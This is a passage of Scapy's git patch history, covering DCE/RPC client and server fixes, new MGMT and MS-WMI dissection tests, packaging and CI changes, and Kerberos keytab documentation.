AttributeError: + continue result.append((lay, doc.strip().split("\n")[0] if doc else lay)) return result From 7c700481102089b3d2b2b8cd9541da69568b28a3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 19 Feb 2026 14:15:00 +0100 Subject: [PATCH 1591/1632] Fix bind() before connect, and case that can happen in SMB --- scapy/layers/msrpce/rpcclient.py | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index b8d227be17d..17fc07ca006 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -148,7 +148,10 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): @property def session(self) -> DceRpcSession: - return self.sock.session + try: + return self.sock.session + except AttributeError: + raise ValueError("Client is not connected ! Please connect()") def connect( self, @@ -485,7 +488,8 @@ def _check_bind_context(self, interface, contexts) -> bool: for i, ctx in enumerate(contexts): if ctx.result == 0: # Context was accepted. Remove all others from cache - self.contexts[interface] = [self.contexts[interface][i]] + if len(self.contexts[interface]) != 1: + self.contexts[interface] = [self.contexts[interface][i]] return True return False From 5477d45da0f8d9a3701d4327599fdecf283397b1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 22 Feb 2026 21:40:04 +0100 Subject: [PATCH 1592/1632] Add MGMT tests --- test/scapy/layers/msrpce/mgmt.uts | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 test/scapy/layers/msrpce/mgmt.uts diff --git a/test/scapy/layers/msrpce/mgmt.uts b/test/scapy/layers/msrpce/mgmt.uts new file mode 100644 index 00000000000..5ca1da04674 --- /dev/null +++ b/test/scapy/layers/msrpce/mgmt.uts @@ -0,0 +1,28 @@ +% C706 MGMT tests + ++ C706 MGMT test vectors + += [C706 MGMT] - Dissect rpc__mgmt_inq_if_ids_Response + +import uuid +from scapy.layers.msrpce.raw.mgmt import * + +DATA = bytes.fromhex('00000200000000000c000000000000000c000000000000000000020000000000000002000000000000000200000000000000020000000000000002000000000000000200000000000000020000000000000002000000000000000200000000000000020000000000000002000000000000000200000000000883afe11f5dc91191a408002b14a0fa0300000084650a0b0f9ecf11a3cf00805f68cb1b0100010026b5551d37c1c546ab79638f2a68e869010000007f0bfe64f59e5345a7db9a197577755401000000e6730ce6f988cf119af10020af6e72f402000000c4fefc9960521b10bbcb00aa0021347a00000000609ee7b9523dce11aaa100006901293f000002001e242f412ac1ce11abff0020af6e7a17000002003601000000000000c0000000000000460000000072eef3c67eced111b71e00c04fc3111a01000000b84a9f4d1c7dcf11861e0020af6e7c5700000000a001000000000000c0000000000000460000000000000000') +pkt = rpc__mgmt_inq_if_ids_Response(DATA) +assert pkt.if_id_vector.value.max_count == 12 +assert pkt.if_id_vector.value.Count == 12 +assert [(uuid.UUID(bytes_le=bytes(x.Uuid)), x.VersMajor, x.VersMinor) for x in pkt.valueof("if_id_vector.IfId")] == [ + (uuid.UUID('e1af8308-5d1f-11c9-91a4-08002b14a0fa'), 3, 0), + (uuid.UUID('0b0a6584-9e0f-11cf-a3cf-00805f68cb1b'), 1, 1), + (uuid.UUID('1d55b526-c137-46c5-ab79-638f2a68e869'), 1, 0), + (uuid.UUID('64fe0b7f-9ef5-4553-a7db-9a1975777554'), 1, 0), + (uuid.UUID('e60c73e6-88f9-11cf-9af1-0020af6e72f4'), 2, 0), + (uuid.UUID('99fcfec4-5260-101b-bbcb-00aa0021347a'), 0, 0), + (uuid.UUID('b9e79e60-3d52-11ce-aaa1-00006901293f'), 0, 2), + (uuid.UUID('412f241e-c12a-11ce-abff-0020af6e7a17'), 0, 2), + (uuid.UUID('00000136-0000-0000-c000-000000000046'), 0, 0), + (uuid.UUID('c6f3ee72-ce7e-11d1-b71e-00c04fc3111a'), 1, 0), + (uuid.UUID('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57'), 0, 0), + (uuid.UUID('000001a0-0000-0000-c000-000000000046'), 0, 0), +] + From f7e30deecf8c172d518bdeaf8192131292794189 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 22 Feb 2026 22:15:21 +0100 Subject: [PATCH 1593/1632] Add MS-WMI tests --- test/scapy/layers/msrpce/mswmi.uts | 49 ++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 test/scapy/layers/msrpce/mswmi.uts diff --git a/test/scapy/layers/msrpce/mswmi.uts b/test/scapy/layers/msrpce/mswmi.uts new file mode 100644 index 00000000000..336e0a8730e --- /dev/null +++ b/test/scapy/layers/msrpce/mswmi.uts @@ -0,0 +1,49 @@ +% MS-WMI Tests + ++ [MS-WMI] build and dissection tests +* To work scapy-rpc extension must be installed + += [MS-WMI] - Import [MS-WMI] + +from scapy.config import conf +conf.exts.load("scapy-rpc") +from scapy.layers.msrpce.raw.ms_wmi import * + += [MS-WMI] - Build ExecQuery_Request + +lang = "WQL\0" +query = "SELECT Name FROM Win32_OperatingSystem\0" + +pkt = ExecQuery_Request( + strQueryLanguage=NDRPointer( + referent_id=0x72657355, + value=FLAGGED_WORD_BLOB( + max_count=len(lang), + cBytes=len(lang) * 2, + clSize=len(lang), + asData=lang.encode("utf-16le"), + ), + ), + strQuery=NDRPointer( + referent_id=0x72657356, + value=FLAGGED_WORD_BLOB( + max_count=len(query), + cBytes=len(query) * 2, + clSize=len(query), + asData=query.encode("utf-16le"), + ), + ), + ndr64=False +) + +assert bytes(pkt) == b"User\x04\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00W\x00Q\x00L\x00\x00\x00Vser'\x00\x00\x00N\x00\x00\x00'\x00\x00\x00S\x00E\x00L\x00E\x00C\x00T\x00 \x00N\x00a\x00m\x00e\x00 \x00F\x00R\x00O\x00M\x00 \x00W\x00i\x00n\x003\x002\x00_\x00O\x00p\x00e\x00r\x00a\x00t\x00i\x00n\x00g\x00S\x00y\x00s\x00t\x00e\x00m\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + += [MS-WMI] - Dissect ExecQuery_Response + +pkt=ExecQuery_Response( + b'\x00\x00\x02\x00\xb6\x00\x00\x00\xb6\x00\x00\x00MEOW\x01\x00\x00\x00\xe1Gy\x021\xd7\xce\x11\xa3W\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\xe5M-e\x07^\xb40\xf9\xed\xa57\xb2\x97\x0e7\x03\xd8\x02\x00,\x01\x00\x00\x15\xfe\x86\xdf\x03\xd6o\x0f9\x00#\x00\x07\x00W\x00I\x00N\x00-\x008\x00K\x001\x005\x00V\x00K\x00V\x002\x004\x00S\x00G\x00\x00\x00\x07\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x000\x000\x00.\x001\x000\x000\x00\x00\x00\x00\x00\t\x00\xff\xff\x00\x00\x1e\x00\xff\xff\x00\x00\x10\x00\xff\xff\x00\x00\n\x00\xff\xff\x00\x00\x16\x00\xff\xff\x00\x00\x1f\x00\xff\xff\x00\x00\x0e\x00\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + ndr64=False +) + +status = pkt.valueof("status") +assert status == 0x0 \ No newline at end of file From 8591a7471262ffd3c53a3e4e94231774261a6528 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 22 Feb 2026 22:21:08 +0100 Subject: [PATCH 1594/1632] Load scapy-rpc in tests --- test/scapy/layers/msrpce/mgmt.uts | 7 ++++++- test/scapy/layers/msrpce/mslsad.uts | 2 ++ test/scapy/layers/msrpce/msscmr.uts | 2 ++ 3 files changed, 10 insertions(+), 1 deletion(-) diff --git a/test/scapy/layers/msrpce/mgmt.uts b/test/scapy/layers/msrpce/mgmt.uts index 5ca1da04674..6d28e42c267 100644 --- a/test/scapy/layers/msrpce/mgmt.uts +++ b/test/scapy/layers/msrpce/mgmt.uts @@ -2,10 +2,15 @@ + C706 MGMT test vectors += [C706 MGMT] - Import layer + +from scapy.config import conf +conf.exts.load("scapy-rpc") +from scapy.layers.msrpce.raw.mgmt import * + = [C706 MGMT] - Dissect rpc__mgmt_inq_if_ids_Response import uuid -from scapy.layers.msrpce.raw.mgmt import * DATA = bytes.fromhex('00000200000000000c000000000000000c000000000000000000020000000000000002000000000000000200000000000000020000000000000002000000000000000200000000000000020000000000000002000000000000000200000000000000020000000000000002000000000000000200000000000883afe11f5dc91191a408002b14a0fa0300000084650a0b0f9ecf11a3cf00805f68cb1b0100010026b5551d37c1c546ab79638f2a68e869010000007f0bfe64f59e5345a7db9a197577755401000000e6730ce6f988cf119af10020af6e72f402000000c4fefc9960521b10bbcb00aa0021347a00000000609ee7b9523dce11aaa100006901293f000002001e242f412ac1ce11abff0020af6e7a17000002003601000000000000c0000000000000460000000072eef3c67eced111b71e00c04fc3111a01000000b84a9f4d1c7dcf11861e0020af6e7c5700000000a001000000000000c0000000000000460000000000000000') pkt = rpc__mgmt_inq_if_ids_Response(DATA) diff --git a/test/scapy/layers/msrpce/mslsad.uts b/test/scapy/layers/msrpce/mslsad.uts index 1d9099a6cc7..339fbd6389c 100644 --- a/test/scapy/layers/msrpce/mslsad.uts +++ b/test/scapy/layers/msrpce/mslsad.uts @@ -6,6 +6,8 @@ = [MS-LSAD] - Import [MS-LSAD] +from scapy.config import conf +conf.exts.load("scapy-rpc") from scapy.layers.msrpce.raw.ms_lsad import * = [MS-LSAD] - Build LsarEnumerateAccountsWithUserRight_Request diff --git a/test/scapy/layers/msrpce/msscmr.uts b/test/scapy/layers/msrpce/msscmr.uts index b925b2ba7d9..3549257d940 100644 --- a/test/scapy/layers/msrpce/msscmr.uts +++ b/test/scapy/layers/msrpce/msscmr.uts @@ -6,6 +6,8 @@ = [MS-SCMR] - Import [MS-SCMR] +from scapy.config import conf +conf.exts.load("scapy-rpc") from scapy.layers.msrpce.raw.ms_scmr import * = [MS-SCMR] - Dissect ROpenServiceW_Request From 90ffdbeb06d9032b3deb3f7657f900515f422dbf Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 22 Feb 2026 22:37:02 +0100 Subject: [PATCH 1595/1632] Fix DCE/RPC tests --- test/scapy/layers/dcerpc.uts | 2 +- test/scapy/layers/msrpce/msscmr.uts | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 27e4d4a9f5c..484e52a606b 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -585,7 +585,7 @@ conf.dcerpc_session_enable = False # Packet 15 has an encrypted vt_trailer assert pkts[15].vt_trailer.commands[0].Command == 2 -assert pkts[15].load == b'\x00\x00\x02\x00\x00\x00\x00\x00\x1a M\xe2\xd6O\xd1\x11\xa3\xda\x00\x00\xf8u\xae\r\x00\x00\x02\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert bytes(pkts[15][DceRpc5Request].payload) == b'\x00\x00\x02\x00\x00\x00\x00\x00\x1a M\xe2\xd6O\xd1\x11\xa3\xda\x00\x00\xf8u\xae\r\x00\x00\x02\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' assert pkts[21].obj.referent_id == 0x1 assert pkts[21].map_tower.value.tower_octet_string == b'\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00' diff --git a/test/scapy/layers/msrpce/msscmr.uts b/test/scapy/layers/msrpce/msscmr.uts index 3549257d940..cc5f0f51bc6 100644 --- a/test/scapy/layers/msrpce/msscmr.uts +++ b/test/scapy/layers/msrpce/msscmr.uts @@ -59,7 +59,7 @@ assert pkt.lpBuffer.value[4:].decode("utf-16le").rstrip("\x00") == "Provides fac DATA = bytes.fromhex('200000000200000001000000000002000400020000000000080002000c0002001000020030000000000000003000000043003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c0073007600630068006f00730074002e0065007800650020002d006b0020006f007300700072006900760061006300790020002d0070000000010000000000000001000000000000002e000000000000002e000000720070006300730073002f00730074006100740065007200650070006f007300690074006f00720079002f0043006f00720065004d006500730073006100670069006e0067005200650067006900730074007200610072002f0000000c000000000000000c0000004c006f00630061006c00530079007300740065006d0000002200000000000000220000004300610070006100620069006c00690074007900200041006300630065007300730020004d0061006e0061006700650072002000530065007200760069006300650000007e01000000000000') pkt = RQueryServiceConfigW_Response(DATA, ndr64=False) assert pkt.status == 0 -assert pkt.pcbBytesNeeded == 389 +assert pkt.pcbBytesNeeded == 382 assert pkt.lpServiceConfig.dwServiceType == 32 assert pkt.lpServiceConfig.dwErrorControl == 1 assert pkt.lpServiceConfig.valueof("lpBinaryPathName") == b'C:\\WINDOWS\\system32\\svchost.exe -k osprivacy -p' From 13fdbbf04955c37410a0f7ab750386e4e9a474fa Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 22 Feb 2026 23:13:20 +0100 Subject: [PATCH 1596/1632] smbclient: Check status instead of response --- scapy/layers/smbclient.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 0eebcb70fd1..61f26e8f8c7 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -40,7 +40,6 @@ from scapy.layers.msrpce.raw.ms_srvs import ( LPSHARE_ENUM_STRUCT, NetrShareEnum_Request, - NetrShareEnum_Response, SHARE_INFO_1_CONTAINER, ) from scapy.layers.ntlm import ( @@ -1301,7 +1300,7 @@ def shares(self): ) resp = self.rpcclient.sr1_req(req, timeout=self.timeout) self.rpcclient.close_smbpipe() - if not isinstance(resp, NetrShareEnum_Response): + if resp.status != 0: resp.show() raise ValueError("NetrShareEnum_Request failed !") results = [] From d55ceceae9a9cd466d12036131b52ec06c9c0f87 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 23 Feb 2026 00:14:06 +0100 Subject: [PATCH 1597/1632] rpcserver: only answer to packets on the currently bound interface --- doc/scapy/layers/dcerpc.rst | 2 -- scapy/layers/dcerpc.py | 3 ++ scapy/layers/msrpce/rpcserver.py | 51 +++++++++++++++++++++++++++++--- 3 files changed, 50 insertions(+), 6 deletions(-) diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index 7e08b59202e..068eac1d8ef 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -393,8 +393,6 @@ To start an endpoint mapper (this should be a separate process from your RPC ser ) -.. note:: Currently, a DCERPC_Server will let a client bind on all interfaces that Scapy has registered (imported). Supposedly though, you know which RPCs are going to be queried. - Debugging with extended error information (eerr) ------------------------------------------------ diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 39ea79a0636..efa7e8e676b 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1305,9 +1305,12 @@ def register_dcerpc_interface(name, uuid, version, opnums): if_version, opnums, ) + # bind for build for opnum, operations in opnums.items(): bind_top_down(DceRpc5Request, operations.request, opnum=opnum) + operations.request.opnum = opnum + operations.request.intf = uuid def find_dcerpc_interface(name) -> DceRpcInterface: diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py index 767d8f09c0c..0569a5304bb 100644 --- a/scapy/layers/msrpce/rpcserver.py +++ b/scapy/layers/msrpce/rpcserver.py @@ -8,6 +8,7 @@ """ import socket +import uuid import threading from collections import deque @@ -27,6 +28,7 @@ DceRpc5Bind, DceRpc5BindAck, DceRpc5BindNak, + DceRpc5Fault, DceRpc5PortAny, DceRpc5Request, DceRpc5Response, @@ -34,6 +36,7 @@ DceRpc5TransferSyntax, DceRpcInterface, DceRpcSession, + NDRPacket, RPC_C_AUTHN_LEVEL, ) @@ -49,11 +52,17 @@ # Typing from typing import ( Dict, + Callable, Optional, + Tuple, ) class _DCERPC_Server_metaclass(type): + # This value is calculated for each DCE/RPC server, and contains + # the callables sorted by interface+opnum + dcerpc_commands: Dict[Tuple[uuid.UUID, int], Callable] = {} + def __new__(cls, name, bases, dct): dct.setdefault( "dcerpc_commands", @@ -108,7 +117,14 @@ def answer(reqcls): """ def deco(func): - func.dcerpc_command = reqcls + if not issubclass(reqcls, NDRPacket): + raise ValueError("Cannot answer a non NDRPacket class !") + try: + func.dcerpc_command = reqcls.intf, reqcls.opnum + except AttributeError: + raise ValueError( + "NDRPacket class isn't registered or isn't a request !" + ) return func return deco @@ -120,10 +136,17 @@ def extend(self, server_cls): self.dcerpc_commands.update(server_cls.dcerpc_commands) def make_reply(self, req): - cls = req[DceRpc5Request].payload.__class__ - if cls in self.dcerpc_commands: + """ + Make a response to the DCE/RPC request. + + This finds whether a callback has been registered for this particular packet, + and call it if available. + """ + opnum = req[DceRpc5Request].opnum + intf = self.session.rpc_bind_interface.uuid + if (intf, opnum) in self.dcerpc_commands: # call handler - return self.dcerpc_commands[cls](self, req) + return self.dcerpc_commands[(intf, opnum)](self, req) return None @classmethod @@ -408,6 +431,26 @@ def recv(self, data): ">> RESPONSE: %s" % (resp.__class__.__name__) ) ) + else: + # Unimplemented request ! + if self.verb: + print( + conf.color_theme.fail( + "! RPC request not implemented by server." + ) + ) + req.show() + + # Return a Fault + hdr.pfc_flags += "PFC_DID_NOT_EXECUTE" + self.queue.extend( + hdr + / DceRpc5Fault( + # nca_s_op_rng_error + status=0x1C010002, + cont_id=req.cont_id, + ) + ) # If there was padding, process the second frag if pad is not None: self.recv(pad) From 87ec73e67c447b32af2c4a705b2d2df9f0fa4ec5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 23 Feb 2026 00:44:21 +0100 Subject: [PATCH 1598/1632] exts: support < 3.9 extensions --- scapy/config.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/config.py b/scapy/config.py index 95c4a419e99..cae73d73f1a 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -652,7 +652,10 @@ def load(self, extension: str): return # Check the classifiers - if distr.metadata.get('License-Expression', None) not in self.GPLV2_LICENCES: + if ( + distr.metadata.get('License-Expression', None) not in self.GPLV2_LICENCES + and distr.metadata.get('License', None) not in self.GPLV2_LICENCES + ): log_loading.warning( "'%s' has no GPLv2 classifier therefore cannot be loaded." % extension ) From c9c91bac1c0dc38d9c384018e7cb2074e881ab98 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 23 Feb 2026 00:54:49 +0100 Subject: [PATCH 1599/1632] 3.8+ tag in tests --- scapy/tools/UTscapy.py | 3 +++ test/scapy/layers/msrpce/mgmt.uts | 1 + test/scapy/layers/msrpce/mslsad.uts | 1 + test/scapy/layers/msrpce/msscmr.uts | 1 + test/scapy/layers/msrpce/mswmi.uts | 4 +++- 5 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index b4761c5b8fc..d778edebe77 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1116,6 +1116,9 @@ def main(): if VERB > 2: print(" " + arrow + " libpcap mode") + if sys.version_info < (3, 8): + KW_KO.append("needs_py38plus") + KW_KO.append("disabled") if ANNOTATIONS_MODE: diff --git a/test/scapy/layers/msrpce/mgmt.uts b/test/scapy/layers/msrpce/mgmt.uts index 6d28e42c267..996faa63670 100644 --- a/test/scapy/layers/msrpce/mgmt.uts +++ b/test/scapy/layers/msrpce/mgmt.uts @@ -1,4 +1,5 @@ % C706 MGMT tests +~ needs_py38plus + C706 MGMT test vectors diff --git a/test/scapy/layers/msrpce/mslsad.uts b/test/scapy/layers/msrpce/mslsad.uts index 339fbd6389c..219907ceaca 100644 --- a/test/scapy/layers/msrpce/mslsad.uts +++ b/test/scapy/layers/msrpce/mslsad.uts @@ -1,4 +1,5 @@ % MS-LSAD tests +~ needs_py38plus + [MS-LSAD] build and dissection tests diff --git a/test/scapy/layers/msrpce/msscmr.uts b/test/scapy/layers/msrpce/msscmr.uts index cc5f0f51bc6..4d30db5454e 100644 --- a/test/scapy/layers/msrpce/msscmr.uts +++ b/test/scapy/layers/msrpce/msscmr.uts @@ -1,4 +1,5 @@ % MS-SCMR tests +~ needs_py38plus + [MS-SCMR] build and dissection tests diff --git a/test/scapy/layers/msrpce/mswmi.uts b/test/scapy/layers/msrpce/mswmi.uts index 336e0a8730e..621dd9ad602 100644 --- a/test/scapy/layers/msrpce/mswmi.uts +++ b/test/scapy/layers/msrpce/mswmi.uts @@ -1,6 +1,8 @@ % MS-WMI Tests +~ needs_py38plus + [MS-WMI] build and dissection tests + * To work scapy-rpc extension must be installed = [MS-WMI] - Import [MS-WMI] @@ -46,4 +48,4 @@ pkt=ExecQuery_Response( ) status = pkt.valueof("status") -assert status == 0x0 \ No newline at end of file +assert status == 0x0 From 5c3fe1cd3f28e2d57fdae94158568b186981b2ff Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 23 Feb 2026 21:29:30 +0300 Subject: [PATCH 1600/1632] ci: install scapy-rpc on Packit --- .packit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index d2594ce22be..48a6181b99f 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,7 +17,7 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" - - "sed -i '/^%check$/aOPENSSL_ENABLE_SHA1_SIGNATURES=1 OPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K netaccess -K scanner' .packit_rpm/scapy.spec" + - "sed -i '/^%check$/apip3 install scapy-rpc\\nOPENSSL_ENABLE_SHA1_SIGNATURES=1 OPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K netaccess -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" From c09a292ee066d4a292c17df13eb290ed38545da3 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Wed, 25 Feb 2026 13:28:30 +0100 Subject: [PATCH 1601/1632] Hack: support setuptools < 77 with modern licenses (#4931) --- pyproject.toml | 3 +-- setup.py | 26 ++++++++++++++++++++++++++ 2 files changed, 27 insertions(+), 2 deletions(-) diff --git a/pyproject.toml b/pyproject.toml index 109963e5cad..1d5ffabfc4f 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -15,7 +15,7 @@ maintainers = [ { name="Guillaume VALADON" }, { name="Nils WEISS" }, ] -license = { text="GPL-2.0-only" } +license = "GPL-2.0-only" requires-python = ">=3.7, <4" description = "Scapy: interactive packet manipulation tool" keywords = [ "network" ] @@ -27,7 +27,6 @@ classifiers = [ "Intended Audience :: Science/Research", "Intended Audience :: System Administrators", "Intended Audience :: Telecommunications Industry", - "License :: OSI Approved :: GNU General Public License v2 (GPLv2)", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.7", diff --git a/setup.py b/setup.py index b1c21b579bb..dc719faece1 100755 --- a/setup.py +++ b/setup.py @@ -12,6 +12,7 @@ raise OSError("Scapy no longer supports Python 2 ! Please use Scapy 2.5.0") try: + import setuptools from setuptools import setup from setuptools.command.sdist import sdist from setuptools.command.build_py import build_py @@ -81,6 +82,31 @@ def build_package_data(self): # ensure there's a scapy/VERSION file _build_version(self.build_lib) + +# Patch so that for setuptools < 77 understands the 'license' version required +# by modern setuptools. See https://github.com/secdev/scapy/issues/4849. +# This allow us to keep support for Python 3.7 +try: + major = int(setuptools.__version__.split(".")[0]) + if major < 77: + # We replace setuptools.dist.pyprojecttoml.apply_configuration with goo + from setuptools.config.pyprojecttoml import read_configuration, _apply + + def _patched_apply_configuration(dist, filepath, *_): + # 1. We force ignore option errors regarding 'license' + config = read_configuration(filepath, True, ignore_option_errors=True, dist=dist) + + # 2. We replace the license with the one it expected + if isinstance(config["project"]["license"], str): + config["project"]["license"] = {'text': config["project"]["license"]} + + return _apply(dist, config, filepath) + + setuptools.dist.pyprojecttoml.apply_configuration = _patched_apply_configuration +except Exception: + pass + + setup( cmdclass={'sdist': SDist, 'build_py': BuildPy}, data_files=[('share/man/man1', ["doc/scapy.1"])], From c3c62ecc3d51a2bbed1b3074dc50ce74488f3c65 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Wed, 25 Feb 2026 15:45:53 +0300 Subject: [PATCH 1602/1632] ci: drop all downstream patches on Packit (#4932) --- .packit.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.packit.yml b/.packit.yml index 48a6181b99f..fa7bda9855b 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,6 +17,8 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" + # Drop all downstream patches to prevent them from interfering with upstream builds + - "sed -ri '/^Patch[0-9]+\\:.+\\.patch/d' .packit_rpm/scapy.spec" - "sed -i '/^%check$/apip3 install scapy-rpc\\nOPENSSL_ENABLE_SHA1_SIGNATURES=1 OPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K netaccess -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" From bba4ec0dd4b31a1103db36c11699ceb837654f15 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Fri, 27 Feb 2026 13:53:07 +0100 Subject: [PATCH 1603/1632] Improve keytab/ccache support (#4935) * Improve keytab/ccache support * Autoargparse: Compat with enums * LDAPHero: minor improvements * Ticketer++: better number of tickets * CLIUtil: improve autocompletion for multi-arg * Fix PEP8 problems --- doc/scapy/layers/kerberos.rst | 21 ++++ scapy/compat.py | 15 ++- scapy/layers/kerberos.py | 15 ++- scapy/layers/ldap.py | 44 +++++-- scapy/layers/smb.py | 2 +- scapy/layers/smbclient.py | 20 ++-- scapy/layers/spnego.py | 27 +++-- scapy/modules/ldaphero.py | 123 +++++++++++++++----- scapy/modules/ticketer.py | 202 ++++++++++++++++++++++++++++++--- scapy/utils.py | 98 +++++++++++++--- test/scapy/layers/kerberos.uts | 54 ++++++++- test/scapy/layers/smb.uts | 4 +- 12 files changed, 530 insertions(+), 95 deletions(-) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index 2ab19f5db83..a2cfe35ee42 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -238,6 +238,23 @@ As you can see, DMSA keys were imported in the keytab. You can use those as deta No tickets in CCache. +- **Create server keytab:** + +The following is equivalent to Windows' ``ktpass.exe /out kt.keytab /mapuser WKS02$@domain.local /princ host/WKS02.domain.local@domain.local /pass ScapyIsNice``. + +.. code:: pycon + + >>> t = Ticketer() + >>> t.add_cred("host/WKS02.domain.local@domain.local", etypes="all", mapupn="WKS02$@domain.local", password="ScapyIsNice") + Enter password: ************ + >>> t.show() + Keytab name: UNSAVED + Principal Timestamp KVNO Keytype + host/WKS02$.domain.local@domain.local 25/02/26 15:40:27 1 AES256-CTS-HMAC-SHA1-96 + + No tickets in CCache. + >>> t.save_keytab("kt.keytab") + - **Change password using kpasswd in 'set' mode:** .. code:: pycon @@ -370,6 +387,10 @@ Cheat sheet +---------------------------------------+--------------------------------+ | ``t.renew(i, [...])`` | Renew a TGT/ST | +---------------------------------------+--------------------------------+ +| ``t.remove_krb(i)`` | Remove a TGT/ST | ++---------------------------------------+--------------------------------+ +| ``t.set_primary(i)`` | Set the primary ticket | ++---------------------------------------+--------------------------------+ Other useful commands --------------------- diff --git a/scapy/compat.py b/scapy/compat.py index e3e2c2875a1..d8e5c050750 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -3,11 +3,12 